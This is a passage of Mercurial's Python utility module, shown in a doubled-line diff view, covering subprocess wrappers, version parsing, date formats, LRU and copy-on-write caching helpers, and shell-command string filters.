417 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
417 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
418 except ValueError:
418 except ValueError:
419 # Empty files cannot be mmapped, but mmapread should still work. Check
419 # Empty files cannot be mmapped, but mmapread should still work. Check
420 # if the file is empty, and if so, return an empty buffer.
420 # if the file is empty, and if so, return an empty buffer.
421 if os.fstat(fd).st_size == 0:
421 if os.fstat(fd).st_size == 0:
422 return ''
422 return ''
423 raise
423 raise
424
424
425 def popen2(cmd, env=None, newlines=False):
425 def popen2(cmd, env=None, newlines=False):
426 # Setting bufsize to -1 lets the system decide the buffer size.
426 # Setting bufsize to -1 lets the system decide the buffer size.
427 # The default for bufsize is 0, meaning unbuffered. This leads to
427 # The default for bufsize is 0, meaning unbuffered. This leads to
428 # poor performance on Mac OS X: http://bugs.python.org/issue4194
428 # poor performance on Mac OS X: http://bugs.python.org/issue4194
429 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
429 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
430 close_fds=closefds,
430 close_fds=closefds,
431 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
431 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
432 universal_newlines=newlines,
432 universal_newlines=newlines,
433 env=env)
433 env=env)
434 return p.stdin, p.stdout
434 return p.stdin, p.stdout
435
435
436 def popen3(cmd, env=None, newlines=False):
436 def popen3(cmd, env=None, newlines=False):
437 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
437 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
438 return stdin, stdout, stderr
438 return stdin, stdout, stderr
439
439
440 def popen4(cmd, env=None, newlines=False, bufsize=-1):
440 def popen4(cmd, env=None, newlines=False, bufsize=-1):
441 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
441 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
442 close_fds=closefds,
442 close_fds=closefds,
443 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
443 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
444 stderr=subprocess.PIPE,
444 stderr=subprocess.PIPE,
445 universal_newlines=newlines,
445 universal_newlines=newlines,
446 env=env)
446 env=env)
447 return p.stdin, p.stdout, p.stderr, p
447 return p.stdin, p.stdout, p.stderr, p
448
448
449 def version():
449 def version():
450 """Return version information if available."""
450 """Return version information if available."""
451 try:
451 try:
452 from . import __version__
452 from . import __version__
453 return __version__.version
453 return __version__.version
454 except ImportError:
454 except ImportError:
455 return 'unknown'
455 return 'unknown'
456
456
457 def versiontuple(v=None, n=4):
457 def versiontuple(v=None, n=4):
458 """Parses a Mercurial version string into an N-tuple.
458 """Parses a Mercurial version string into an N-tuple.
459
459
460 The version string to be parsed is specified with the ``v`` argument.
460 The version string to be parsed is specified with the ``v`` argument.
461 If it isn't defined, the current Mercurial version string will be parsed.
461 If it isn't defined, the current Mercurial version string will be parsed.
462
462
463 ``n`` can be 2, 3, or 4. Here is how some version strings map to
463 ``n`` can be 2, 3, or 4. Here is how some version strings map to
464 returned values:
464 returned values:
465
465
466 >>> v = b'3.6.1+190-df9b73d2d444'
466 >>> v = b'3.6.1+190-df9b73d2d444'
467 >>> versiontuple(v, 2)
467 >>> versiontuple(v, 2)
468 (3, 6)
468 (3, 6)
469 >>> versiontuple(v, 3)
469 >>> versiontuple(v, 3)
470 (3, 6, 1)
470 (3, 6, 1)
471 >>> versiontuple(v, 4)
471 >>> versiontuple(v, 4)
472 (3, 6, 1, '190-df9b73d2d444')
472 (3, 6, 1, '190-df9b73d2d444')
473
473
474 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
474 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
475 (3, 6, 1, '190-df9b73d2d444+20151118')
475 (3, 6, 1, '190-df9b73d2d444+20151118')
476
476
477 >>> v = b'3.6'
477 >>> v = b'3.6'
478 >>> versiontuple(v, 2)
478 >>> versiontuple(v, 2)
479 (3, 6)
479 (3, 6)
480 >>> versiontuple(v, 3)
480 >>> versiontuple(v, 3)
481 (3, 6, None)
481 (3, 6, None)
482 >>> versiontuple(v, 4)
482 >>> versiontuple(v, 4)
483 (3, 6, None, None)
483 (3, 6, None, None)
484
484
485 >>> v = b'3.9-rc'
485 >>> v = b'3.9-rc'
486 >>> versiontuple(v, 2)
486 >>> versiontuple(v, 2)
487 (3, 9)
487 (3, 9)
488 >>> versiontuple(v, 3)
488 >>> versiontuple(v, 3)
489 (3, 9, None)
489 (3, 9, None)
490 >>> versiontuple(v, 4)
490 >>> versiontuple(v, 4)
491 (3, 9, None, 'rc')
491 (3, 9, None, 'rc')
492
492
493 >>> v = b'3.9-rc+2-02a8fea4289b'
493 >>> v = b'3.9-rc+2-02a8fea4289b'
494 >>> versiontuple(v, 2)
494 >>> versiontuple(v, 2)
495 (3, 9)
495 (3, 9)
496 >>> versiontuple(v, 3)
496 >>> versiontuple(v, 3)
497 (3, 9, None)
497 (3, 9, None)
498 >>> versiontuple(v, 4)
498 >>> versiontuple(v, 4)
499 (3, 9, None, 'rc+2-02a8fea4289b')
499 (3, 9, None, 'rc+2-02a8fea4289b')
500 """
500 """
501 if not v:
501 if not v:
502 v = version()
502 v = version()
503 parts = remod.split('[\+-]', v, 1)
503 parts = remod.split('[\+-]', v, 1)
504 if len(parts) == 1:
504 if len(parts) == 1:
505 vparts, extra = parts[0], None
505 vparts, extra = parts[0], None
506 else:
506 else:
507 vparts, extra = parts
507 vparts, extra = parts
508
508
509 vints = []
509 vints = []
510 for i in vparts.split('.'):
510 for i in vparts.split('.'):
511 try:
511 try:
512 vints.append(int(i))
512 vints.append(int(i))
513 except ValueError:
513 except ValueError:
514 break
514 break
515 # (3, 6) -> (3, 6, None)
515 # (3, 6) -> (3, 6, None)
516 while len(vints) < 3:
516 while len(vints) < 3:
517 vints.append(None)
517 vints.append(None)
518
518
519 if n == 2:
519 if n == 2:
520 return (vints[0], vints[1])
520 return (vints[0], vints[1])
521 if n == 3:
521 if n == 3:
522 return (vints[0], vints[1], vints[2])
522 return (vints[0], vints[1], vints[2])
523 if n == 4:
523 if n == 4:
524 return (vints[0], vints[1], vints[2], extra)
524 return (vints[0], vints[1], vints[2], extra)
525
525
526 # used by parsedate
526 # used by parsedate
527 defaultdateformats = (
527 defaultdateformats = (
528 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
528 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
529 '%Y-%m-%dT%H:%M', # without seconds
529 '%Y-%m-%dT%H:%M', # without seconds
530 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
530 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
531 '%Y-%m-%dT%H%M', # without seconds
531 '%Y-%m-%dT%H%M', # without seconds
532 '%Y-%m-%d %H:%M:%S', # our common legal variant
532 '%Y-%m-%d %H:%M:%S', # our common legal variant
533 '%Y-%m-%d %H:%M', # without seconds
533 '%Y-%m-%d %H:%M', # without seconds
534 '%Y-%m-%d %H%M%S', # without :
534 '%Y-%m-%d %H%M%S', # without :
535 '%Y-%m-%d %H%M', # without seconds
535 '%Y-%m-%d %H%M', # without seconds
536 '%Y-%m-%d %I:%M:%S%p',
536 '%Y-%m-%d %I:%M:%S%p',
537 '%Y-%m-%d %H:%M',
537 '%Y-%m-%d %H:%M',
538 '%Y-%m-%d %I:%M%p',
538 '%Y-%m-%d %I:%M%p',
539 '%Y-%m-%d',
539 '%Y-%m-%d',
540 '%m-%d',
540 '%m-%d',
541 '%m/%d',
541 '%m/%d',
542 '%m/%d/%y',
542 '%m/%d/%y',
543 '%m/%d/%Y',
543 '%m/%d/%Y',
544 '%a %b %d %H:%M:%S %Y',
544 '%a %b %d %H:%M:%S %Y',
545 '%a %b %d %I:%M:%S%p %Y',
545 '%a %b %d %I:%M:%S%p %Y',
546 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
546 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
547 '%b %d %H:%M:%S %Y',
547 '%b %d %H:%M:%S %Y',
548 '%b %d %I:%M:%S%p %Y',
548 '%b %d %I:%M:%S%p %Y',
549 '%b %d %H:%M:%S',
549 '%b %d %H:%M:%S',
550 '%b %d %I:%M:%S%p',
550 '%b %d %I:%M:%S%p',
551 '%b %d %H:%M',
551 '%b %d %H:%M',
552 '%b %d %I:%M%p',
552 '%b %d %I:%M%p',
553 '%b %d %Y',
553 '%b %d %Y',
554 '%b %d',
554 '%b %d',
555 '%H:%M:%S',
555 '%H:%M:%S',
556 '%I:%M:%S%p',
556 '%I:%M:%S%p',
557 '%H:%M',
557 '%H:%M',
558 '%I:%M%p',
558 '%I:%M%p',
559 )
559 )
560
560
561 extendeddateformats = defaultdateformats + (
561 extendeddateformats = defaultdateformats + (
562 "%Y",
562 "%Y",
563 "%Y-%m",
563 "%Y-%m",
564 "%b",
564 "%b",
565 "%b %Y",
565 "%b %Y",
566 )
566 )
567
567
568 def cachefunc(func):
568 def cachefunc(func):
569 '''cache the result of function calls'''
569 '''cache the result of function calls'''
570 # XXX doesn't handle keywords args
570 # XXX doesn't handle keywords args
571 if func.__code__.co_argcount == 0:
571 if func.__code__.co_argcount == 0:
572 cache = []
572 cache = []
573 def f():
573 def f():
574 if len(cache) == 0:
574 if len(cache) == 0:
575 cache.append(func())
575 cache.append(func())
576 return cache[0]
576 return cache[0]
577 return f
577 return f
578 cache = {}
578 cache = {}
579 if func.__code__.co_argcount == 1:
579 if func.__code__.co_argcount == 1:
580 # we gain a small amount of time because
580 # we gain a small amount of time because
581 # we don't need to pack/unpack the list
581 # we don't need to pack/unpack the list
582 def f(arg):
582 def f(arg):
583 if arg not in cache:
583 if arg not in cache:
584 cache[arg] = func(arg)
584 cache[arg] = func(arg)
585 return cache[arg]
585 return cache[arg]
586 else:
586 else:
587 def f(*args):
587 def f(*args):
588 if args not in cache:
588 if args not in cache:
589 cache[args] = func(*args)
589 cache[args] = func(*args)
590 return cache[args]
590 return cache[args]
591
591
592 return f
592 return f
593
593
594 class cow(object):
594 class cow(object):
595 """helper class to make copy-on-write easier
595 """helper class to make copy-on-write easier
596
596
597 Call preparewrite before doing any writes.
597 Call preparewrite before doing any writes.
598 """
598 """
599
599
600 def preparewrite(self):
600 def preparewrite(self):
601 """call this before writes, return self or a copied new object"""
601 """call this before writes, return self or a copied new object"""
602 if getattr(self, '_copied', 0):
602 if getattr(self, '_copied', 0):
603 self._copied -= 1
603 self._copied -= 1
604 return self.__class__(self)
604 return self.__class__(self)
605 return self
605 return self
606
606
607 def copy(self):
607 def copy(self):
608 """always do a cheap copy"""
608 """always do a cheap copy"""
609 self._copied = getattr(self, '_copied', 0) + 1
609 self._copied = getattr(self, '_copied', 0) + 1
610 return self
610 return self
611
611
612 class sortdict(collections.OrderedDict):
612 class sortdict(collections.OrderedDict):
613 '''a simple sorted dictionary
613 '''a simple sorted dictionary
614
614
615 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
615 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
616 >>> d2 = d1.copy()
616 >>> d2 = d1.copy()
617 >>> d2
617 >>> d2
618 sortdict([('a', 0), ('b', 1)])
618 sortdict([('a', 0), ('b', 1)])
619 >>> d2.update([(b'a', 2)])
619 >>> d2.update([(b'a', 2)])
620 >>> list(d2.keys()) # should still be in last-set order
620 >>> list(d2.keys()) # should still be in last-set order
621 ['b', 'a']
621 ['b', 'a']
622 '''
622 '''
623
623
624 def __setitem__(self, key, value):
624 def __setitem__(self, key, value):
625 if key in self:
625 if key in self:
626 del self[key]
626 del self[key]
627 super(sortdict, self).__setitem__(key, value)
627 super(sortdict, self).__setitem__(key, value)
628
628
629 if pycompat.ispypy:
629 if pycompat.ispypy:
630 # __setitem__() isn't called as of PyPy 5.8.0
630 # __setitem__() isn't called as of PyPy 5.8.0
631 def update(self, src):
631 def update(self, src):
632 if isinstance(src, dict):
632 if isinstance(src, dict):
633 src = src.iteritems()
633 src = src.iteritems()
634 for k, v in src:
634 for k, v in src:
635 self[k] = v
635 self[k] = v
636
636
637 class cowdict(cow, dict):
637 class cowdict(cow, dict):
638 """copy-on-write dict
638 """copy-on-write dict
639
639
640 Be sure to call d = d.preparewrite() before writing to d.
640 Be sure to call d = d.preparewrite() before writing to d.
641
641
642 >>> a = cowdict()
642 >>> a = cowdict()
643 >>> a is a.preparewrite()
643 >>> a is a.preparewrite()
644 True
644 True
645 >>> b = a.copy()
645 >>> b = a.copy()
646 >>> b is a
646 >>> b is a
647 True
647 True
648 >>> c = b.copy()
648 >>> c = b.copy()
649 >>> c is a
649 >>> c is a
650 True
650 True
651 >>> a = a.preparewrite()
651 >>> a = a.preparewrite()
652 >>> b is a
652 >>> b is a
653 False
653 False
654 >>> a is a.preparewrite()
654 >>> a is a.preparewrite()
655 True
655 True
656 >>> c = c.preparewrite()
656 >>> c = c.preparewrite()
657 >>> b is c
657 >>> b is c
658 False
658 False
659 >>> b is b.preparewrite()
659 >>> b is b.preparewrite()
660 True
660 True
661 """
661 """
662
662
663 class cowsortdict(cow, sortdict):
663 class cowsortdict(cow, sortdict):
664 """copy-on-write sortdict
664 """copy-on-write sortdict
665
665
666 Be sure to call d = d.preparewrite() before writing to d.
666 Be sure to call d = d.preparewrite() before writing to d.
667 """
667 """
668
668
669 class transactional(object):
669 class transactional(object):
670 """Base class for making a transactional type into a context manager."""
670 """Base class for making a transactional type into a context manager."""
671 __metaclass__ = abc.ABCMeta
671 __metaclass__ = abc.ABCMeta
672
672
673 @abc.abstractmethod
673 @abc.abstractmethod
674 def close(self):
674 def close(self):
675 """Successfully closes the transaction."""
675 """Successfully closes the transaction."""
676
676
677 @abc.abstractmethod
677 @abc.abstractmethod
678 def release(self):
678 def release(self):
679 """Marks the end of the transaction.
679 """Marks the end of the transaction.
680
680
681 If the transaction has not been closed, it will be aborted.
681 If the transaction has not been closed, it will be aborted.
682 """
682 """
683
683
684 def __enter__(self):
684 def __enter__(self):
685 return self
685 return self
686
686
687 def __exit__(self, exc_type, exc_val, exc_tb):
687 def __exit__(self, exc_type, exc_val, exc_tb):
688 try:
688 try:
689 if exc_type is None:
689 if exc_type is None:
690 self.close()
690 self.close()
691 finally:
691 finally:
692 self.release()
692 self.release()
693
693
694 @contextlib.contextmanager
694 @contextlib.contextmanager
695 def acceptintervention(tr=None):
695 def acceptintervention(tr=None):
696 """A context manager that closes the transaction on InterventionRequired
696 """A context manager that closes the transaction on InterventionRequired
697
697
698 If no transaction was provided, this simply runs the body and returns
698 If no transaction was provided, this simply runs the body and returns
699 """
699 """
700 if not tr:
700 if not tr:
701 yield
701 yield
702 return
702 return
703 try:
703 try:
704 yield
704 yield
705 tr.close()
705 tr.close()
706 except error.InterventionRequired:
706 except error.InterventionRequired:
707 tr.close()
707 tr.close()
708 raise
708 raise
709 finally:
709 finally:
710 tr.release()
710 tr.release()
711
711
712 @contextlib.contextmanager
712 @contextlib.contextmanager
713 def nullcontextmanager():
713 def nullcontextmanager():
714 yield
714 yield
715
715
716 class _lrucachenode(object):
716 class _lrucachenode(object):
717 """A node in a doubly linked list.
717 """A node in a doubly linked list.
718
718
719 Holds a reference to nodes on either side as well as a key-value
719 Holds a reference to nodes on either side as well as a key-value
720 pair for the dictionary entry.
720 pair for the dictionary entry.
721 """
721 """
722 __slots__ = (u'next', u'prev', u'key', u'value')
722 __slots__ = (u'next', u'prev', u'key', u'value')
723
723
724 def __init__(self):
724 def __init__(self):
725 self.next = None
725 self.next = None
726 self.prev = None
726 self.prev = None
727
727
728 self.key = _notset
728 self.key = _notset
729 self.value = None
729 self.value = None
730
730
731 def markempty(self):
731 def markempty(self):
732 """Mark the node as emptied."""
732 """Mark the node as emptied."""
733 self.key = _notset
733 self.key = _notset
734
734
735 class lrucachedict(object):
735 class lrucachedict(object):
736 """Dict that caches most recent accesses and sets.
736 """Dict that caches most recent accesses and sets.
737
737
738 The dict consists of an actual backing dict - indexed by original
738 The dict consists of an actual backing dict - indexed by original
739 key - and a doubly linked circular list defining the order of entries in
739 key - and a doubly linked circular list defining the order of entries in
740 the cache.
740 the cache.
741
741
742 The head node is the newest entry in the cache. If the cache is full,
742 The head node is the newest entry in the cache. If the cache is full,
743 we recycle head.prev and make it the new head. Cache accesses result in
743 we recycle head.prev and make it the new head. Cache accesses result in
744 the node being moved to before the existing head and being marked as the
744 the node being moved to before the existing head and being marked as the
745 new head node.
745 new head node.
746 """
746 """
747 def __init__(self, max):
747 def __init__(self, max):
748 self._cache = {}
748 self._cache = {}
749
749
750 self._head = head = _lrucachenode()
750 self._head = head = _lrucachenode()
751 head.prev = head
751 head.prev = head
752 head.next = head
752 head.next = head
753 self._size = 1
753 self._size = 1
754 self._capacity = max
754 self._capacity = max
755
755
756 def __len__(self):
756 def __len__(self):
757 return len(self._cache)
757 return len(self._cache)
758
758
759 def __contains__(self, k):
759 def __contains__(self, k):
760 return k in self._cache
760 return k in self._cache
761
761
762 def __iter__(self):
762 def __iter__(self):
763 # We don't have to iterate in cache order, but why not.
763 # We don't have to iterate in cache order, but why not.
764 n = self._head
764 n = self._head
765 for i in range(len(self._cache)):
765 for i in range(len(self._cache)):
766 yield n.key
766 yield n.key
767 n = n.next
767 n = n.next
768
768
769 def __getitem__(self, k):
769 def __getitem__(self, k):
770 node = self._cache[k]
770 node = self._cache[k]
771 self._movetohead(node)
771 self._movetohead(node)
772 return node.value
772 return node.value
773
773
774 def __setitem__(self, k, v):
774 def __setitem__(self, k, v):
775 node = self._cache.get(k)
775 node = self._cache.get(k)
776 # Replace existing value and mark as newest.
776 # Replace existing value and mark as newest.
777 if node is not None:
777 if node is not None:
778 node.value = v
778 node.value = v
779 self._movetohead(node)
779 self._movetohead(node)
780 return
780 return
781
781
782 if self._size < self._capacity:
782 if self._size < self._capacity:
783 node = self._addcapacity()
783 node = self._addcapacity()
784 else:
784 else:
785 # Grab the last/oldest item.
785 # Grab the last/oldest item.
786 node = self._head.prev
786 node = self._head.prev
787
787
788 # At capacity. Kill the old entry.
788 # At capacity. Kill the old entry.
789 if node.key is not _notset:
789 if node.key is not _notset:
790 del self._cache[node.key]
790 del self._cache[node.key]
791
791
792 node.key = k
792 node.key = k
793 node.value = v
793 node.value = v
794 self._cache[k] = node
794 self._cache[k] = node
795 # And mark it as newest entry. No need to adjust order since it
795 # And mark it as newest entry. No need to adjust order since it
796 # is already self._head.prev.
796 # is already self._head.prev.
797 self._head = node
797 self._head = node
798
798
799 def __delitem__(self, k):
799 def __delitem__(self, k):
800 node = self._cache.pop(k)
800 node = self._cache.pop(k)
801 node.markempty()
801 node.markempty()
802
802
803 # Temporarily mark as newest item before re-adjusting head to make
803 # Temporarily mark as newest item before re-adjusting head to make
804 # this node the oldest item.
804 # this node the oldest item.
805 self._movetohead(node)
805 self._movetohead(node)
806 self._head = node.next
806 self._head = node.next
807
807
808 # Additional dict methods.
808 # Additional dict methods.
809
809
810 def get(self, k, default=None):
810 def get(self, k, default=None):
811 try:
811 try:
812 return self._cache[k].value
812 return self._cache[k].value
813 except KeyError:
813 except KeyError:
814 return default
814 return default
815
815
816 def clear(self):
816 def clear(self):
817 n = self._head
817 n = self._head
818 while n.key is not _notset:
818 while n.key is not _notset:
819 n.markempty()
819 n.markempty()
820 n = n.next
820 n = n.next
821
821
822 self._cache.clear()
822 self._cache.clear()
823
823
824 def copy(self):
824 def copy(self):
825 result = lrucachedict(self._capacity)
825 result = lrucachedict(self._capacity)
826 n = self._head.prev
826 n = self._head.prev
827 # Iterate in oldest-to-newest order, so the copy has the right ordering
827 # Iterate in oldest-to-newest order, so the copy has the right ordering
828 for i in range(len(self._cache)):
828 for i in range(len(self._cache)):
829 result[n.key] = n.value
829 result[n.key] = n.value
830 n = n.prev
830 n = n.prev
831 return result
831 return result
832
832
833 def _movetohead(self, node):
833 def _movetohead(self, node):
834 """Mark a node as the newest, making it the new head.
834 """Mark a node as the newest, making it the new head.
835
835
836 When a node is accessed, it becomes the freshest entry in the LRU
836 When a node is accessed, it becomes the freshest entry in the LRU
837 list, which is denoted by self._head.
837 list, which is denoted by self._head.
838
838
839 Visually, let's make ``N`` the new head node (* denotes head):
839 Visually, let's make ``N`` the new head node (* denotes head):
840
840
841 previous/oldest <-> head <-> next/next newest
841 previous/oldest <-> head <-> next/next newest
842
842
843 ----<->--- A* ---<->-----
843 ----<->--- A* ---<->-----
844 | |
844 | |
845 E <-> D <-> N <-> C <-> B
845 E <-> D <-> N <-> C <-> B
846
846
847 To:
847 To:
848
848
849 ----<->--- N* ---<->-----
849 ----<->--- N* ---<->-----
850 | |
850 | |
851 E <-> D <-> C <-> B <-> A
851 E <-> D <-> C <-> B <-> A
852
852
853 This requires the following moves:
853 This requires the following moves:
854
854
855 C.next = D (node.prev.next = node.next)
855 C.next = D (node.prev.next = node.next)
856 D.prev = C (node.next.prev = node.prev)
856 D.prev = C (node.next.prev = node.prev)
857 E.next = N (head.prev.next = node)
857 E.next = N (head.prev.next = node)
858 N.prev = E (node.prev = head.prev)
858 N.prev = E (node.prev = head.prev)
859 N.next = A (node.next = head)
859 N.next = A (node.next = head)
860 A.prev = N (head.prev = node)
860 A.prev = N (head.prev = node)
861 """
861 """
862 head = self._head
862 head = self._head
863 # C.next = D
863 # C.next = D
864 node.prev.next = node.next
864 node.prev.next = node.next
865 # D.prev = C
865 # D.prev = C
866 node.next.prev = node.prev
866 node.next.prev = node.prev
867 # N.prev = E
867 # N.prev = E
868 node.prev = head.prev
868 node.prev = head.prev
869 # N.next = A
869 # N.next = A
870 # It is tempting to do just "head" here, however if node is
870 # It is tempting to do just "head" here, however if node is
871 # adjacent to head, this will do bad things.
871 # adjacent to head, this will do bad things.
872 node.next = head.prev.next
872 node.next = head.prev.next
873 # E.next = N
873 # E.next = N
874 node.next.prev = node
874 node.next.prev = node
875 # A.prev = N
875 # A.prev = N
876 node.prev.next = node
876 node.prev.next = node
877
877
878 self._head = node
878 self._head = node
879
879
880 def _addcapacity(self):
880 def _addcapacity(self):
881 """Add a node to the circular linked list.
881 """Add a node to the circular linked list.
882
882
883 The new node is inserted before the head node.
883 The new node is inserted before the head node.
884 """
884 """
885 head = self._head
885 head = self._head
886 node = _lrucachenode()
886 node = _lrucachenode()
887 head.prev.next = node
887 head.prev.next = node
888 node.prev = head.prev
888 node.prev = head.prev
889 node.next = head
889 node.next = head
890 head.prev = node
890 head.prev = node
891 self._size += 1
891 self._size += 1
892 return node
892 return node
893
893
894 def lrucachefunc(func):
894 def lrucachefunc(func):
895 '''cache most recent results of function calls'''
895 '''cache most recent results of function calls'''
896 cache = {}
896 cache = {}
897 order = collections.deque()
897 order = collections.deque()
898 if func.__code__.co_argcount == 1:
898 if func.__code__.co_argcount == 1:
899 def f(arg):
899 def f(arg):
900 if arg not in cache:
900 if arg not in cache:
901 if len(cache) > 20:
901 if len(cache) > 20:
902 del cache[order.popleft()]
902 del cache[order.popleft()]
903 cache[arg] = func(arg)
903 cache[arg] = func(arg)
904 else:
904 else:
905 order.remove(arg)
905 order.remove(arg)
906 order.append(arg)
906 order.append(arg)
907 return cache[arg]
907 return cache[arg]
908 else:
908 else:
909 def f(*args):
909 def f(*args):
910 if args not in cache:
910 if args not in cache:
911 if len(cache) > 20:
911 if len(cache) > 20:
912 del cache[order.popleft()]
912 del cache[order.popleft()]
913 cache[args] = func(*args)
913 cache[args] = func(*args)
914 else:
914 else:
915 order.remove(args)
915 order.remove(args)
916 order.append(args)
916 order.append(args)
917 return cache[args]
917 return cache[args]
918
918
919 return f
919 return f
920
920
921 class propertycache(object):
921 class propertycache(object):
922 def __init__(self, func):
922 def __init__(self, func):
923 self.func = func
923 self.func = func
924 self.name = func.__name__
924 self.name = func.__name__
925 def __get__(self, obj, type=None):
925 def __get__(self, obj, type=None):
926 result = self.func(obj)
926 result = self.func(obj)
927 self.cachevalue(obj, result)
927 self.cachevalue(obj, result)
928 return result
928 return result
929
929
930 def cachevalue(self, obj, value):
930 def cachevalue(self, obj, value):
931 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
931 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
932 obj.__dict__[self.name] = value
932 obj.__dict__[self.name] = value
933
933
934 def pipefilter(s, cmd):
934 def pipefilter(s, cmd):
935 '''filter string S through command CMD, returning its output'''
935 '''filter string S through command CMD, returning its output'''
936 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
936 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
937 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
937 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
938 pout, perr = p.communicate(s)
938 pout, perr = p.communicate(s)
939 return pout
939 return pout
940
940
941 def tempfilter(s, cmd):
941 def tempfilter(s, cmd):
942 '''filter string S through a pair of temporary files with CMD.
942 '''filter string S through a pair of temporary files with CMD.
943 CMD is used as a template to create the real command to be run,
943 CMD is used as a template to create the real command to be run,
944 with the strings INFILE and OUTFILE replaced by the real names of
944 with the strings INFILE and OUTFILE replaced by the real names of
945 the temporary files generated.'''
945 the temporary files generated.'''
946 inname, outname = None, None
946 inname, outname = None, None
947 try:
947 try:
948 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
948 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
949 fp = os.fdopen(infd, pycompat.sysstr('wb'))
949 fp = os.fdopen(infd, pycompat.sysstr('wb'))
950 fp.write(s)
950 fp.write(s)
951 fp.close()
951 fp.close()
952 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
952 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
953 os.close(outfd)
953 os.close(outfd)
954 cmd = cmd.replace('INFILE', inname)
954 cmd = cmd.replace('INFILE', inname)
955 cmd = cmd.replace('OUTFILE', outname)
955 cmd = cmd.replace('OUTFILE', outname)
956 code = os.system(cmd)
956 code = os.system(cmd)
957 if pycompat.sysplatform == 'OpenVMS' and code & 1:
957 if pycompat.sysplatform == 'OpenVMS' and code & 1:
958 code = 0
958 code = 0
959 if code:
959 if code:
960 raise Abort(_("command '%s' failed: %s") %
960 raise Abort(_("command '%s' failed: %s") %
961 (cmd, explainexit(code)))
961 (cmd, explainexit(code)))
962 return readfile(outname)
962 return readfile(outname)
963 finally:
963 finally:
964 try:
964 try:
965 if inname:
965 if inname:
966 os.unlink(inname)
966 os.unlink(inname)
967 except OSError:
967 except OSError:
968 pass
968 pass
969 try:
969 try:
970 if outname:
970 if outname:
971 os.unlink(outname)
971 os.unlink(outname)
972 except OSError:
972 except OSError:
973 pass
973 pass
974
974
975 filtertable = {
975 filtertable = {
976 'tempfile:': tempfilter,
976 'tempfile:': tempfilter,
977 'pipe:': pipefilter,
977 'pipe:': pipefilter,
978 }
978 }
979
979
980 def filter(s, cmd):
980 def filter(s, cmd):
981 "filter a string through a command that transforms its input to its output"
981 "filter a string through a command that transforms its input to its output"
982 for name, fn in filtertable.iteritems():
982 for name, fn in filtertable.iteritems():
983 if cmd.startswith(name):
983 if cmd.startswith(name):
984 return fn(s, cmd[len(name):].lstrip())
984 return fn(s, cmd[len(name):].lstrip())
985 return pipefilter(s, cmd)
985 return pipefilter(s, cmd)
986
986
987 def binary(s):
987 def binary(s):
988 """return true if a string is binary data"""
988 """return true if a string is binary data"""
989 return bool(s and '\0' in s)
989 return bool(s and '\0' in s)
990
990
991 def increasingchunks(source, min=1024, max=65536):
991 def increasingchunks(source, min=1024, max=65536):
992 '''return no less than min bytes per chunk while data remains,
992 '''return no less than min bytes per chunk while data remains,
993 doubling min after each chunk until it reaches max'''
993 doubling min after each chunk until it reaches max'''
994 def log2(x):
994 def log2(x):
995 if not x:
995 if not x:
996 return 0
996 return 0
997 i = 0
997 i = 0
998 while x:
998 while x:
999 x >>= 1
999 x >>= 1
1000 i += 1
1000 i += 1
1001 return i - 1
1001 return i - 1
1002
1002
1003 buf = []
1003 buf = []
1004 blen = 0
1004 blen = 0
1005 for chunk in source:
1005 for chunk in source:
1006 buf.append(chunk)
1006 buf.append(chunk)
1007 blen += len(chunk)
1007 blen += len(chunk)
1008 if blen >= min:
1008 if blen >= min:
1009 if min < max:
1009 if min < max:
1010 min = min << 1
1010 min = min << 1
1011 nmin = 1 << log2(blen)
1011 nmin = 1 << log2(blen)
1012 if nmin > min:
1012 if nmin > min:
1013 min = nmin
1013 min = nmin
1014 if min > max:
1014 if min > max:
1015 min = max
1015 min = max
1016 yield ''.join(buf)
1016 yield ''.join(buf)
1017 blen = 0
1017 blen = 0
1018 buf = []
1018 buf = []
1019 if buf:
1019 if buf:
1020 yield ''.join(buf)
1020 yield ''.join(buf)
1021
1021
1022 Abort = error.Abort
1022 Abort = error.Abort
1023
1023
1024 def always(fn):
1024 def always(fn):
1025 return True
1025 return True
1026
1026
1027 def never(fn):
1027 def never(fn):
1028 return False
1028 return False
1029
1029
1030 def nogc(func):
1030 def nogc(func):
1031 """disable garbage collector
1031 """disable garbage collector
1032
1032
1033 Python's garbage collector triggers a GC each time a certain number of
1033 Python's garbage collector triggers a GC each time a certain number of
1034 container objects (the number being defined by gc.get_threshold()) are
1034 container objects (the number being defined by gc.get_threshold()) are
1035 allocated even when marked not to be tracked by the collector. Tracking has
1035 allocated even when marked not to be tracked by the collector. Tracking has
1036 no effect on when GCs are triggered, only on what objects the GC looks
1036 no effect on when GCs are triggered, only on what objects the GC looks
1037 into. As a workaround, disable GC while building complex (huge)
1037 into. As a workaround, disable GC while building complex (huge)
1038 containers.
1038 containers.
1039
1039
1040 This garbage collector issue have been fixed in 2.7. But it still affect
1040 This garbage collector issue have been fixed in 2.7. But it still affect
1041 CPython's performance.
1041 CPython's performance.
1042 """
1042 """
